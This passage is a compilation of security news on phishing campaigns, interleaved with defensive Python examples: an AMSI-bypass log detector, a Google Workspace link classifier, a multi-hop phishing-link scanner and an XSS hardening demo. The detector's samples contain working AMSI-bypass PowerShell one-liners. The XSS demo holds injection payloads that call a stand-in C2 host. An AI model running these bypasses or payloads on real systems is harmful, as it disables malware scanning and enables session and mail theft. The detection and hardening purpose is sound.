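    ("amsi-utils-reflection", re.compile(r"system\.management\.automation\.amsiutils", re.I)),
    ("amsi-init-failed", re.compile(r"amsiinitfailed", re.I)),
    ("amsi-scan-buffer", re.compile(r"amsiscanbuffer", re.I)),
    ("amsi-context-or-session", re.compile(r"amsicontext|amsisession", re.I)),
]


def defang_splits(script: str) -> str:
    """Undo cheap keyword-splitting obfuscation before matching:
    'Am'+'si' -> 'Amsi', "Am"+"si" -> "Amsi", Am`si -> Amsi; whitespace is collapsed.
    Used only for matching; the original record is kept for the analyst."""
    s = re.sub(r"""['"]\s*\+\s*['"]""", "", script)  # join adjacent string literals
    s = s.replace("`", "")                           # drop PowerShell escape backticks
    return re.sub(r"\s+", " ", s)


def scan_script_block(event: dict):
    """event mimics a PowerShell 4104 record with RecordId and ScriptBlockText fields.
    Returns the matching indicator names, or None when the script looks clean."""
    text = defang_splits(event["ScriptBlockText"])
    hits = [name for name, pattern in AMSI_INDICATORS if pattern.search(text)]
    return {"record_id": event["RecordId"], "hits": hits} if hits else None


def scan_events(events):
    return [r for r in (scan_script_block(e) for e in events) if r is not None]


# --- constructed sample records: one benign, two AMSI bypass attempts ---
SAMPLE_EVENTS = [
    {"RecordId": 1001,
     "ScriptBlockText": "Get-Process | Where-Object { $_.CPU -gt 100 } | Sort-Object CPU"},
    {"RecordId": 1002,
     "ScriptBlockText": "[Ref].Assembly.GetType('System.Management.Automation.Am'+'siUtils')"
                        ".GetField('am'+'siInitFailed','NonPublic,Static').SetValue($null,$true)"},
    {"RecordId": 1003,
     "ScriptBlockText": '$a=[Ref].Assembly.GetType("System.Management.Automation.Amsi`Utils"); '
                        '$f=$a.GetField("amsiInit`Failed","NonPublic,Static"); $f.SetValue($null,$true)'},
]

if __name__ == "__main__":
    for result in scan_events(SAMPLE_EVENTS):
        print(f"record {result['record_id']}: {', '.join(result['hits'])}")
```

Two caveats for anyone wiring this into a SIEM: script block logging must be enabled by policy before it yields 4104 events, and this string-level check does not catch bypasses that patch AmsiScanBuffer in memory through P/Invoke without naming it in a single literal, which is why it should complement rather than replace AMSI's own telemetry.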

Network attack volume rose by another million detections this quarter, an aggressive trajectory that underlines the continuing importance of perimeter security alongside user-focused protections. Whereas overall ransomware detections on endpoints fell from 2018 to 2020, the trend reversed in the first half of 2021, with the six-month total finishing just short of the full-year total for 2020.

The Colonial Pipeline attack on May 7, 2021 demonstrated unequivocally that ransomware is here to stay. The breach, the top security incident of the quarter, shows that cybercriminals are not only targeting the most essential services, such as hospitals, industrial control systems and infrastructure, but also intensifying attacks against such high-value targets.

Among the quarter's top network attacks, one targeted a 2020 vulnerability in the popular PHP scripting language, while the other three were older: a 2011 Oracle GlassFish Server vulnerability, a 2013 SQL injection flaw in the OpenEMR medical records application, and a 2017 remote code execution (RCE) vulnerability in Microsoft Edge. All are years old, yet each remains dangerous on unpatched systems.

Although these are old vectors that have hopefully been patched in most environments, organizations that have not yet patched will be in for a shock if an attacker reaches them first. A similar RCE flaw, CVE-2021-40444, made headlines earlier this month when it was exploited in targeted attacks against Microsoft Office and Office 365 on Windows 10 systems.

Malware targeting Microsoft Exchange servers and generic email clients to install remote access trojans (RATs) in sensitive locations has increased recently, most likely because Q2 was the second consecutive quarter in which remote workers and students returned to hybrid offices and classrooms or to normal on-site work.

In any case, strong security awareness and monitoring of outbound communications from devices that are not directly behind the corporate network are advisable, wherever those devices are.

Medical Data of 12,000 Patients Exposed Following Revere Health Phishing Attack

 

An employee of Revere Health, the largest healthcare provider in Utah, was targeted by a phishing email that exposed medical records of approximately 12,000 patients, including patients of a cardiology practice in St. George.

According to a breach notification sent out by Revere Health on Friday, the employee's mailbox was exposed for roughly 45 minutes on June 21 and leaked some private details about patients of the Heart of Dixie Cardiology Department in St. George. Revere Health's IT team identified the phishing attack quickly and immediately secured the mailbox to prevent further unauthorized access.

After a two-month investigation, Revere Health believes the attacker's aim was not to obtain patient data but to use the email account to launch more convincing phishing emails against other Revere employees. The company found no sign of the patients' data being shared online and deemed the breach a "low-level risk" to the affected patients.

“From our detailed investigation of this incident, we believe that the intent of this attack was to harvest login credentials from individuals in our organization and not to gather patient information. Our security logs suggest that the attacker had three objectives: (1) to spread phishing emails, (2) to gather active usernames and passwords and (3) to attempt financial fraud against Revere Health," stated the healthcare company. 

The exposed data included medical record numbers, dates of birth, provider names, procedures, and insurance provider names. According to Bob Freeze, director of marketing and communications for Revere Health, no financial information such as credit card details was exposed. The company has informed the affected patients and advised them to remain vigilant.

According to the FBI's 2020 Internet Crime Report, phishing attacks accounted for 241,342 victims and over $54 million in losses in 2020. That is more than double the 114,702 phishing victims reported in 2019; in 2018 there were only 26,379.

Freeze says Revere Health has further strengthened its security protocols and will now send simulated phishing emails to employees to prevent further attacks. Employees who click on the test emails will have to undergo awareness training from the group's IT department. The company has also advised employees to review every aspect of an email before engaging with it.

According to the Federal Trade Commission (FTC), a phishing email often looks like it comes from a company or person you know and trust, and the fraud becomes apparent only when the sender address and links are examined closely. The FTC recommends several measures to avoid phishing: keeping software on devices up to date, installing security software, using multi-factor authentication so that a password alone is not enough to log in, and backing up data regularly. Users are also advised not to open links from suspicious email addresses or phone numbers.

Google Docs Scams Still Pose a Risk

 

A phishing attack known as the "Google Docs worm" spread across the internet in May 2017. It impersonated Google Docs and, through a third-party web app, requested full access to the targets' Gmail messages and contact lists. The scam worked so well because the requests appeared to come from people the target knew. If permission was granted, the app sent the same fake email to the victim's contacts, spreading the worm further. It affected more than a million accounts before Google contained it.

However, new research suggests the company's fixes are insufficient and that another Google Docs phishing scam could strike at any time.

According to independent security researcher Matthew Bryant, Google Workspace phishing and scams draw most of their effectiveness from abusing legitimate features and services. Targets are inclined to fall for the attacks because they trust Google's services, and the approach largely puts the activity beyond the reach of antivirus tools and other security scanners, since it runs online within a legitimate platform.

In research presented at the Defcon security conference this month, Bryant showed techniques attackers could use to get past Google's upgraded Workspace protections. Recent scams have used the same general method: modifying genuine Google Workspace notifications and features to make phishing links or pages look more real and appealing to targets.

All of these problems, according to Bryant, stem from Workspace's conceptual design. The same qualities that make the platform versatile, adaptable, and sharing-friendly also make it open to misuse. With more than 2.6 billion Google Workspace users, the stakes are significant.

“The design has issues in the first place, and that leads to all of these security problems, which can’t just be fixed—most of them are not magical one-off fixes. Google has made an effort, but these risks come from specific design decisions. A fundamental improvement would involve the painful process of potentially re-architecting this stuff,” he added. 

Following the 2017 incident, Google tightened the rules for applications that interact with Google Workspace, particularly those that request sensitive data such as email or contacts. These "Apps Script" apps can be written by individuals, although Google mainly enables them so that corporate users can customize and extend Workspace. Under the additional restrictions, if an app has more than 100 users, the developer must submit it to Google for a thorough review before it can be released, and if someone tries to run an unreviewed app with fewer than 100 users, Workspace displays a prominent warning page. 

Even with those safeguards in place, Bryant discovered a flaw: such small applications can run without warnings if a user receives one attached to a document from someone in their own Google Workspace organization. The idea is that users trust their coworkers enough that strict warnings and prompts are unnecessary. Design decisions of this kind, however, leave open possible attack paths. 


Bryant found that by sharing a link to a Google Doc with one of these applications attached, and changing the word "edit" at the end of the URL to "copy", he could present the user who opens the link with a conspicuous "Copy document" prompt. One can simply close the tab, but a user who believes the document is genuine and clicks to create a copy becomes the creator and owner of that copy. They are also recorded as the "developer" of the app, which is still bound to the document. When the program then asks for permission to run and harvest their Google account data, the victim sees their own email address in the prompt and receives no warning.
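The URL manipulation just described, and the consent screen the 2017 worm relied on, both leave traces that an email gateway can key on. The following Python is an added example, not code from the article or from Bryant's research: it classifies Google Workspace links by host, document id and action, and flags the "/copy" action, direct Drive downloads, Apps Script web-app URLs, OAuth consent URLs that request mail or contact scopes, and lookalike hosts that borrow Google's brand words. The regular expressions, the scope list and the sample links are this example's own assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Path shapes of real Google endpoints; the patterns themselves are this example's own.
DOCS_PATH = re.compile(r"^/(document|spreadsheets|presentation|forms)/d/([\w-]+)(?:/(\w+))?")
DRIVE_FILE = re.compile(r"^/file/d/([\w-]+)(?:/(\w+))?")

# OAuth scopes that give an app the kind of mail and contact access the 2017 worm asked for.
HIGH_RISK_SCOPES = {
    "https://mail.google.com/",
    "https://www.googleapis.com/auth/gmail.readonly",
    "https://www.googleapis.com/auth/gmail.modify",
    "https://www.googleapis.com/auth/gmail.send",
    "https://www.googleapis.com/auth/contacts",
    "https://www.googleapis.com/auth/contacts.readonly",
}


def classify_workspace_link(url):
    """Return host, kind, document id, action and a list of risk flags for one URL."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    qs = parse_qs(parts.query)
    info = {"host": host, "kind": "non-google", "id": None, "action": None, "flags": []}

    if host == "docs.google.com":
        m = DOCS_PATH.match(parts.path)
        if m:
            info.update(kind=m.group(1), id=m.group(2), action=m.group(3) or "edit")
            if info["action"] == "copy":
                # The copy prompt makes the recipient owner of the copy and "developer"
                # of any script bound to it, so the consent screen shows their own
                # address and no third-party warning.
                info["flags"].append("copy action on a shared document")
    elif host == "drive.google.com":
        m = DRIVE_FILE.match(parts.path)
        if m:
            info.update(kind="file", id=m.group(1), action=m.group(2) or "view")
        elif parts.path.startswith("/uc"):
            info.update(kind="file", id=(qs.get("id") or [None])[0], action="download")
        if info["action"] == "download":
            info["flags"].append("direct download link, no preview")
    elif host == "script.google.com":
        info.update(kind="apps-script", action="exec" if parts.path.endswith("/exec") else "other")
        info["flags"].append("Apps Script web app URL")
    elif host == "accounts.google.com" and parts.path.startswith("/o/oauth2"):
        scopes = set(" ".join(qs.get("scope", [])).split())
        info.update(kind="oauth-consent", id=(qs.get("client_id") or [None])[0], action="consent")
        risky = sorted(scopes & HIGH_RISK_SCOPES)
        if risky:
            info["flags"].append("consent request for mail/contact scopes: " + ", ".join(risky))
    elif host == "google.com" or host.endswith(".google.com"):
        info["kind"] = "other-google"
    elif any(word in host for word in ("google", "docs", "drive", "gmail")):
        info["flags"].append("lookalike host using Google brand words")
    return info


if __name__ == "__main__":
    # Constructed sample links, not real documents or client ids.
    for sample in (
        "https://docs.google.com/document/d/1AbC_dEf-9xyz/edit",
        "https://docs.google.com/document/d/1AbC_dEf-9xyz/copy",
        "https://drive.google.com/uc?export=download&id=1ZzArchive",
        "https://accounts.google.com/o/oauth2/v2/auth?client_id=1234.apps.googleusercontent.com"
        "&scope=https://mail.google.com/%20https://www.googleapis.com/auth/contacts"
        "&redirect_uri=https://example.invalid/cb",
        "https://docs.google.com.share-verify.example/document/d/1AbC/edit",
    ):
        r = classify_workspace_link(sample)
        print(f'{r["kind"]:14} {r["action"] or "-":9} {r["flags"] or "ok"}')
```

A gateway rule built on this would not block every flagged link (plenty of legitimate "/copy" links circulate inside organizations) but would route them to a sandbox or attach a banner, which is exactly the friction the "trusted coworker" exemption removes.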

Although not all of an app's components copy over with the document, Bryant found a way around this too: an attacker can embed the missing components in Google Workspace's version of a task-automation "macro", which is closely analogous to the Microsoft Office macros that are so frequently abused. 

Finally, an attacker could persuade one person inside a company to take ownership of and grant access to a malicious app, and then use it to reach other people's Google accounts inside the same company without triggering any warning. 

A Google spokesperson told WIRED, "We’re appreciative of the researcher’s work in identifying and reporting these risks. We are actively making further product improvements based on this research.” 

According to Bryant, none of these weaknesses are unique to Google Workspace, and the prospect of future Google Docs phishing attacks is no reason for panic. The classic advice applies: users should only open files they expect, and if they are unsure why they have received a particular document, they should check with the purported sender. 

On the other hand, the findings highlight the difficulty of preventing misuse on omnipresent platforms designed for flexibility and simplicity. Even something seemingly harmless like Google Docs may rapidly become a launchpad for an attack, possibly affecting billions of people.

Kaspersky Lab detected 1,500 phishing resources targeting crypto investors

Since the beginning of the year, Kaspersky Lab has detected more than 1,500 fraudulent resources around the world aimed at potential crypto investors or at users interested in mining cryptocurrency.

Kaspersky Lab's experts warned of an increase in the volume of fraud targeting crypto investors: since the beginning of 2021 they have identified more than 1,500 such fraudulent resources.

The company also reported that this year it has blocked more than 70,000 attempts by users to visit these fraudulent sites.

Criminals create phishing pages designed to steal the private keys that give access to all of a victim's digital assets and crypto wallets. Such sites are usually hosted in popular domain zones such as .com, .net, .org and .info, or in cheap ones such as .site, .xyz, .online, .top, .club and .live.

Kaspersky Lab noted how detailed the malicious sites are; as an example, the experts cite pages that load real data from existing cryptocurrency exchanges. This is explained by the relatively high level of technical knowledge that people interested in investing in digital currencies tend to have: attackers understand this and keep refining their techniques.

Scammers also frequently send notifications about fictitious sales of video cards and other cryptocurrency mining equipment, persuading the victim to buy hardware for which an advance payment is required.

As the experts note, cybercriminals readily combine the topic of cryptocurrency investment with the names of famous people. For example, people in the U.S. recently lost several million dollars to a scheme using Elon Musk's name, in which investors were promised generous returns on behalf of the head of SpaceX.

According to an InfoWatch expert, the first wave of interest in cryptocurrencies in Russia began in 2016-2017. Fraudulent schemes aimed at people just beginning to take an interest in digital assets, mining and blockchain platforms, as well as at the first investors, became widespread at the same time.

Hackers Employ Milanote App for Spreading Phishing Emails

 

The use of collaborative applications surged during the pandemic, including Microsoft Teams, Google Meet, Zoom and many others. Web-based software makes brainstorming, designing and collaborating with team members easier for all kinds of ideas. 

Milanote is among the most popular apps of this period. It is positioned as a tool for creatives to take notes, collect material and collaborate, and is used for organizing notes, gathering ideas, structuring activities and workflows, and much more. Companies including Uber, Facebook, Google and Nike are cited among its users. 

According to analysts, the Milanote app, which reviewers have called "the Evernote for creatives," has drawn the attention of cybercriminals, who abuse it to run credential-stealing campaigns that slip past secure email gateways (SEGs). 

A report published on Thursday by Avanan shows that the attackers approach their victims with a simple email. The subject line reads "Project Proposal Invoice", and the body is terse, saying only: "Hello. See attached invoice for the above-referenced project. Please contact me if you have questions or need additional information. Thank you." There is no customization, branding or other social-engineering flourish in the message. 

“The email itself is pretty standard issue,” Gil Friedrich, CEO and co-founder of Avanan, stated. “It gets attention with the subject of ‘Invoice for Project Proposal.’ It’s certainly not the most sophisticated effort in the world, however, it understands what emails can get past static scanners, including, in this case, Milanote.” 

If the recipient opens the link in the email, a one-line Milanote document loads ("I shared a file with you. Click on the "Download" link (see below)") along with a clickable "Open Docs" button. 

The volume of these evasive phishing attacks has recently increased "dramatically," according to Avanan researchers: of 1,430 emails analyzed that contained a link to Milanote, 1,367 (a striking 95.5 percent) were part of phishing campaigns. 

“[Most] use static scanners to scan attachments or links for malicious payloads,” according to the writeup. “In response, hackers are bypassing those detection mechanisms by nesting the payloads in deeper layers within legitimate services, fooling the static scanners. This is part of a larger trend of hackers utilizing legitimate services to host malicious content. Because the scanner doesn’t go that deep, hackers can leverage these services to host their content and easily send it to users.” 
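To make the writeup's point concrete, here is an added example (not Avanan's code or tooling) of the difference between a scanner that stops at the landing page and one that follows a hosted document's outbound links. The chain is a constructed offline model: a mailbox link redirects to a one-line Milanote board whose "Open Docs" link leads, through an invented intermediate host, to a credential form. Hosts, paths, page bodies and the trusted-host list are all assumptions made for the example.

```python
import re
from urllib.parse import urljoin, urlsplit

# Constructed offline stand-in for the web: url -> (status, Location header, body).
# None of these hosts or pages are real; they model the chain described in the post.
FAKE_WEB = {
    "https://mail.example.com/attachment/invoice-1023":
        (302, "https://app.milanote.com/1N0TEb0ard/shared", ""),
    "https://app.milanote.com/1N0TEb0ard/shared":
        (200, None, '<p>I shared a file with you. Click on the "Download" link (see below)</p>'
                    '<a href="https://files.example-cdn.net/doc.html">Open Docs</a>'),
    "https://files.example-cdn.net/doc.html":
        (302, "https://login-verify.example.net/office365", ""),
    "https://login-verify.example.net/office365":
        (200, None, '<form method="post" action="/submit"><input name="email">'
                    '<input name="password" type="password"></form>'),
}

# Hosting services a gateway is inclined to trust; an assumed list for the example.
TRUSTED_HOSTS = {"app.milanote.com", "quip.com", "docs.google.com", "drive.google.com"}
REDIRECTS = {301, 302, 303, 307, 308}
HREF = re.compile(r'href="([^"]+)"', re.I)


def fetch(url):
    """Stand-in for an HTTP GET against the constructed web above."""
    return FAKE_WEB.get(url, (404, None, ""))


def host_of(url):
    return (urlsplit(url).hostname or "").lower()


def resolve_redirects(url, fetch=fetch, limit=5):
    """Follow Location headers; even a shallow scanner does this much."""
    for _ in range(limit):
        status, location, _ = fetch(url)
        if status in REDIRECTS and location:
            url = urljoin(url, location)
        else:
            break
    return url


def scan(start, max_depth, fetch=fetch):
    """Breadth-first walk over off-host links, max_depth documents beyond the landing page.
    Returns the hosts visited and the URLs to flag: pages reached by way of a trusted
    hosting service that land on an untrusted host and ask for a password."""
    queue = [(start, 0)]
    visited, hosts, flagged = set(), [], []
    via_trusted = False
    while queue:
        url, depth = queue.pop(0)
        url = resolve_redirects(url, fetch)
        if url in visited:
            continue
        visited.add(url)
        host = host_of(url)
        hosts.append(host)
        status, _, body = fetch(url)
        if status != 200:
            continue
        if host in TRUSTED_HOSTS:
            via_trusted = True
        elif via_trusted and 'type="password"' in body.lower():
            flagged.append(url)
        if depth < max_depth:
            for link in HREF.findall(body):
                target = urljoin(url, link)
                if host_of(target) != host:
                    queue.append((target, depth + 1))
    return {"hosts": hosts, "flagged": flagged}


if __name__ == "__main__":
    start = "https://mail.example.com/attachment/invoice-1023"
    print("depth 0:", scan(start, 0))   # sees only app.milanote.com, nothing flagged
    print("depth 2:", scan(start, 2))   # reaches the credential form and flags it
```

At depth 0 the scanner resolves the redirect, sees a Milanote board and stops; that is the "static scanner" verdict the writeup describes. One extra hop is enough to reach the form on the untrusted host, which is why a gateway should budget for at least a couple of off-host hops whenever the landing page sits on a free hosting or collaboration service.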

Friedrich said that scammers are increasingly applying this technique across a large number of services. The rise of collaboration platforms has also given attackers new channels for social engineering and new ways to evade defenses. 

“We’re talking to people on Zoom, sharing thoughts on Slack, using whiteboards on Jamboard and thousands of other services. Email is still incredibly important, of course, but there are other places where information is transmitted,” he added. 

Cybercriminals can bring malicious links to wherever users already are, rather than relying on email alone, and collaboration apps give them easy access to those places. Because users have not had the same phishing-awareness training for these platforms, their guard may be down, which makes it an easy way for fraudsters to achieve many of their goals. Users are advised to stay alert to the Milanote attack and similar fast-growing campaigns by following established security best practices. 

Email Fatigue Elevates Cyber Crime Rates

 

According to research, email is the preferred medium of communication for almost 86 percent of professionals. The average office employee receives 121 emails a day and sends roughly 40 business emails, and Radicati Group's 2017 study reports that 269 billion emails are sent daily to just over 3.7 billion email users worldwide. Consequently, email-based cyber-attacks are also sky-rocketing. 

Furthermore, because of the broad shift to working from home during the pandemic, more critical data is communicated through email than ever. Users can receive hundreds of emails every day, and screening them takes time and effort. 

Given the rising volume, it is no surprise that email fatigue is growing. Unfortunately, this exhaustion makes it easier for people to click on a harmful email, which helps explain why 94 percent of malware is currently delivered by email. 

Email fatigue describes the condition in which email users feel overwhelmed by the volume of email they receive. For senders it often shows up as unsubscribes, low conversion rates or a large number of spam reports. 

Spam is an old-school approach, but it is still used for nefarious ends. Fake unsubscribe links are one tactic cybercriminals use to refine their mailing lists and validate addresses: whenever a user clicks the bogus link in a spam email, the spammer learns that the address is real, active and regularly checked. From there the user can be sent further malicious payloads by email. 

Notable phishing incidents include the attack on Five Rivers Health Centers in Dayton, Ohio, where the details of 155,000 patients were exposed for two months following an email phishing attack, and the more than 10,000 phishing scams exploiting coronavirus concerns that the UK's Her Majesty's Revenue and Customs (HMRC) investigated in 2020. 

Successful spear phishing is behind 95 percent of attacks on enterprise networks. Australian hedge fund Levitas Capital was the target of a whaling attack, a form of spear phishing, in November 2020. Although it cost the firm $800,000, well below the 8 million dollars initially feared, the attack also cost the fund its largest client, and the company ultimately had to close permanently. 

A 2019 cybersecurity survey found that 26 percent of global firms had been compromised by between one and ten business email compromise (BEC) attacks. Recent BEC attacks include: 

  • Shark Tank host Barbara Corcoran, who lost $380,000; 
  • the Puerto Rican government, which lost $4 million; 
  • Japanese media giant Nikkei, which wired $29 million on the instructions of a bogus email.

Cybercriminals constantly refine their email tactics by playing on the victim's emotions: causing fear, exploiting greed, capitalizing on curiosity, asking for help, or lulling users into feeling comfortable. This strategy is frequently employed by ransomware-as-a-service operators. 

A one-and-done approach never works when it comes to email security. Malware only needs to get past a single defense, so a solution must include several protective layers: if malware defeats one layer, the next one stops it. 

A multi-layered approach combined with technologies such as those in Acronis Cyber Protect, including URL filtering, can block harmful domains and malware downloads before the first systems are affected.

FedEx and DHL Express Hit with Phishing Attacks

 

Researchers reported on Tuesday that they had discovered two email phishing campaigns, impersonating FedEx and DHL Express, that targeted at least 10,000 mailboxes and aimed to harvest victims' work email credentials. In a blog post published by Armorblox, the researchers said one campaign impersonates a FedEx online document share, and the other claims to share shipping details from DHL. The phishing pages were hosted on free services such as Quip and Google Firebase to fool security tools and users into thinking the links were legitimate.

“The email titles, sender names, and content did enough to mask their true intention and make victims think the emails were really from FedEx and DHL Express respectively,” said researchers with Armorblox on Tuesday. “Emails informing us of FedEx scanned documents or missed DHL deliveries are not out of the ordinary; most users will tend to take quick action on these emails instead of studying them in detail for any inconsistencies.” 

The phishing email spoofing the American delivery company FedEx was titled "You have a new FedEx sent to you," followed by the date the email was sent. It contained some details about the document to make it look legitimate, such as its ID, number of pages and document type, alongside a link to view the supposed document. Recipients who clicked were taken to a file hosted on Quip. Quip, which has a free tier, is a Salesforce tool offering documents, spreadsheets, slides and chat. 

A separate campaign impersonated the German international courier DHL Express, with emails telling recipients "Your parcel has arrived," with their email address appended to the subject line. The email said a package could not be delivered because of incorrect delivery details and was instead waiting for pickup at the post office, and prompted recipients to check the attached "shipping documents" if they wanted to receive the delivery. The attachment was an HTML file (named "SHIPPING DOC") that, when opened, displayed a preview of a spreadsheet that looked like shipping documents.

Hacking Group Earth Wendigo Exploits Emails via Spear-phishing Attacks


According to cybersecurity experts, the attacks are attributed to Earth Wendigo, a threat actor not currently linked to any known hacking group. Trend Micro reported that multiple organizations, including research institutions, government organizations and universities, have been attacked by Earth Wendigo since May 2019. The campaign used spear-phishing emails against its victims, and a related series of attacks targeted activists and politicians supporting movements in Hong Kong, Tibet and the Uyghur region. 

Trend Micro reports, "we discovered a new campaign that has been targeting several organizations — including government organizations, research institutions and universities in Taiwan — since May 2019, aiming to exfiltrate emails from targeted organizations via the injection of JavaScript backdoors to a webmail system that is widely-used in Taiwan. With no clear connection to any previous attack group, we gave this new threat actor the name “Earth Wendigo.” 

Earth Wendigo's spear-phishing emails contained obfuscated JavaScript code as the initial attack vector; that JavaScript loaded further malicious scripts from remote servers controlled by the attackers. The scripts were built to steal webmail session keys and browser cookies, to propagate by appending malicious code to the target's email signature, and to exploit an XSS (cross-site scripting) vulnerability in the webmail server for JavaScript injection. "The Earth Wendigo threat actor will establish a WebSocket connection between the victims and their WebSocket server via a JavaScript backdoor. The WebSocket server instructs the backdoor on the victim’s browser to read emails from the webmail server and then send the content and attachments of the emails back to the WebSocket servers," says Trend Micro. 

The XSS vulnerability lies in the webmail system's shortcut feature, which allowed the threat actor to insert a crafted shortcut payload that replaces parts of the webmail page with malicious JavaScript. "Additional investigation shows that the threat actor also sent spear-phishing emails embedded with malicious links to multiple individuals, including politicians and activists, who support movements in Tibet, the Uyghur region, or Hong Kong. However, this is a separate series of attacks from their operation in Taiwan, which this report covers," reports Trend Micro.
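The shortcut bug as described is a stored XSS: user-controlled text is rendered into the webmail page without escaping. The Python below is an added example, not code from Trend Micro's report or from the affected webmail product (whose implementation is not shown here). It places a vulnerable shortcut renderer beside a hardened one, and adds a small scan for active content in stored signatures of the kind the campaign used for propagation. The anchor markup, the payload, the allowed-scheme list and the sample signature are this example's own assumptions.

```python
import html
import re
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"", "http", "https"}   # "" keeps relative links such as /mail/inbox


def render_shortcut_vulnerable(label, target):
    """Raw interpolation: whatever the user stored lands in the page markup verbatim."""
    return f'<a class="shortcut" href="{target}">{label}</a>'


def render_shortcut_hardened(label, target):
    """Escape both values for the HTML context and refuse non-http(s) targets."""
    cleaned = re.sub(r"[\x00-\x20]", "", target)        # defeat "java\tscript:" tricks
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme not in ALLOWED_SCHEMES or cleaned.startswith("//"):
        cleaned = "#"                                    # no javascript:/data:/off-site targets
    return (f'<a class="shortcut" href="{html.escape(cleaned, quote=True)}">'
            f'{html.escape(label, quote=True)}</a>')


# Markers of active content in stored user HTML (signatures, shortcut labels).
ACTIVE_CONTENT = re.compile(r"<script\b|\bon[a-z]+\s*=|javascript:", re.I)


def find_active_content(stored_html):
    """Return the script tags, inline event handlers and javascript: URLs found."""
    return [m.group(0) for m in ACTIVE_CONTENT.finditer(stored_html)]


if __name__ == "__main__":
    # Constructed payload: a shortcut label that closes the anchor and loads a remote script.
    payload = 'Inbox</a><script src="https://c2.example.net/loader.js"></script>'
    print(render_shortcut_vulnerable(payload, "/mail/inbox"))
    print(render_shortcut_hardened(payload, "/mail/inbox"))
    print(render_shortcut_hardened("Help", "javascript:alert(document.cookie)"))
    # Constructed signature carrying an injected event handler, as a propagation vector.
    signature = '-- <br>Alice Example<img src="x" onerror="fetch(\'https://c2.example.net/s\')">'
    print(find_active_content(signature))
```

The hardened renderer is the server-side half of the fix; the other half is a Content Security Policy that disallows inline script and remote script hosts, so that an injection which does slip through has nothing to execute. The signature scan is the kind of sweep an incident responder runs across stored mailbox settings after a campaign like this, since the backdoor persists in data, not in the webmail binary.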

PayPal Phishing Scam 2021, Here's How to Stay Guarded

 


Another PayPal phishing campaign is attempting to steal account logins and other personal data. Malicious actors are sending users text messages warning them that their accounts have been permanently "limited" and urging them to sign in and verify their identity and account via a supplied link. As is typical of PayPal phishing messages, this one includes all the essential ingredients to deceive users: a short claim that threatens consequences and a fake link that redirects users to a spoofed site. 

Cybercriminals exploit users' inexperience with well-worn social engineering techniques, crafting emails or messages that resemble those from real organizations so that victims readily hand over their details. 

The hyperlink in the new PayPal phishing campaign redirects phone users to a spoofed web page that looks identical to PayPal's, although the web address is noticeably different. Prospective victims are immediately asked to sign in to their accounts. They are then redirected to a page giving a few explanations of why their account has been limited and encouraging them to secure it, followed by another page asking for personal data such as full name, date of birth and billing address. Once users fill in these details, everything is sent to the operators behind the scam, who could use it to abuse the PayPal account, open new bank accounts in the victim's name, or feed future phishing campaigns. 

If you have been tricked into filling in these fields, take the following steps to limit the damage: 

 • Sign in to your PayPal account and change the password right away. 

 • If the same password is used for any other accounts, change it there as well. 

 • Inform PayPal about the scam and that you may have been affected. 

 • To ensure no fraudulent accounts are opened in your name, place a temporary freeze on your credit report.

To stay safe, be wary of such links and follow the organization's own guidance. Note also that PayPal never sends its customers text messages pressuring them to visit and sign in to its site immediately; only cybercriminals operate that way. The company sends such information only by email, and it always includes an explanation for the limitation.

6.15 Lakh Facebook Users' Accounts Compromised by Facebook Ad Phishing Campaign

 



Cybersecurity researchers have exposed a large-scale ad phishing campaign that has compromised more than 6.15 lakh (615,000) Facebook accounts. The campaign spans at least 50 countries, and the accounts are reportedly being compromised through phishing pages hosted on GitHub Pages, the static-site hosting feature of the open-source code repository GitHub. 
 
ThreatNix, a Nepal-based security firm, said that the number of affected users is growing rapidly, at an unusual pace of over 100 entries per minute, and that the situation is expected to worsen further if the necessary steps are not taken in time.  
 
The researchers noted, "the phishing campaign began with a sponsored Facebook post that was offering 3GB of mobile data from Nepal Telecom and was redirecting to a phishing site hosted on GitHub Pages; the attackers created different pages imitating the legitimate pages of numerous entities. The attackers were using the profile picture and name of Nepal Telecom". 
 
In addition, the firm said in a statement this week that "similar Facebook posts were used to target the Facebook users from Pakistan, Tunisia, Norway, Malaysia, Philippines, and Norway". According to the firm's findings, the campaign uses localized Facebook posts whose links redirect to a static GitHub Pages site containing a Facebook login panel. 
 
The researchers also noted that "after redirecting to a static GitHub page it forwarded the phished credentials to two endpoints one to a Firestore database and another to a domain which was owned by the phishing group". They further found nearly 500 GitHub repositories containing phishing pages belonging to the same campaign. 
 
ThreatNix said it is working with other parties to "bring down the phishing infrastructure by reserving the information related to the domain". The attackers used Bitly links that initially pointed to a benign page; once the Facebook ad was approved, the short link was switched to point to the phishing domain. They relied on Bitly because Facebook now checks that such phishing pages are not approved for ads.

Credential Phishing Attack Impersonating USPS Targets Consumers Over the Holidays

 

As the year comes to a close, malicious actors are actively targeting the 2020 holiday season. In recent months there has been a steady upsurge in cybercrime related to online shopping, as people have increasingly shopped online this year, and security experts predict a further spike in scams during the holidays, especially throughout December. 

On Wednesday, Abnormal Security disclosed that its email security platform had blocked a credential phishing attack impersonating the U.S. Postal Service to harvest victims' credit card details. The attack asked recipients to pay a special delivery charge in order to receive their delivery within three days. 

Companies report that customers expect fast delivery and that online orders continue to pour in, which puts courier services under growing pressure. The pandemic has driven up demand for online shipping, and the surge is proving dangerous for inexperienced customers of USPS, Amazon, FedEx and UPS. In a related blog post, Abnormal Security said the attackers were taking advantage of customers looking for fast delivery over the holidays. 

Recent research by Check Point found that shipping-related phishing emails increased 440 percent in November 2020 compared with October, and more phishing scams are expected this holiday season. 

Abnormal Security said in its blog post that it blocked the attack, which targeted between 15,000 and 50,000 customer mailboxes. 

According to the company's analysis, the attack imitates USPS delivery notification emails, telling customers that their parcel cannot be delivered until payment is confirmed. The emails appeared to originate from the real U.S. Postal Service, borrowing its official branding. They contained a link to a fake USPS tracking site that asked for a special shipping charge for fast delivery, ultimately leading recipients to enter their credit card information. 

Hank Schless, Senior Manager, Security Solutions at Lookout said, "an attack like this can be even more effective if the target accesses it from a mobile device. It’s harder to spot a phishing attack on mobile than it is on a desktop. Since mobile devices have smaller screens and a simplified user experience, people are less inclined to verify the sender’s real email address or identity. In this particular case, if the targeted individual doesn’t know how to preview a link on mobile, they are at higher risk of falling for the scam."

Jamie Hart, Cyber Threat Intelligence Analyst at Digital Shadows, suggests that users and security teams follow the steps below to help prevent phishing attacks. 

• Install antivirus software 
• Keep all systems updated with the latest security patches 
• Use a web filter that blocks suspicious websites 
• Offer more frequent security training, including when and where users should report suspected phishing emails.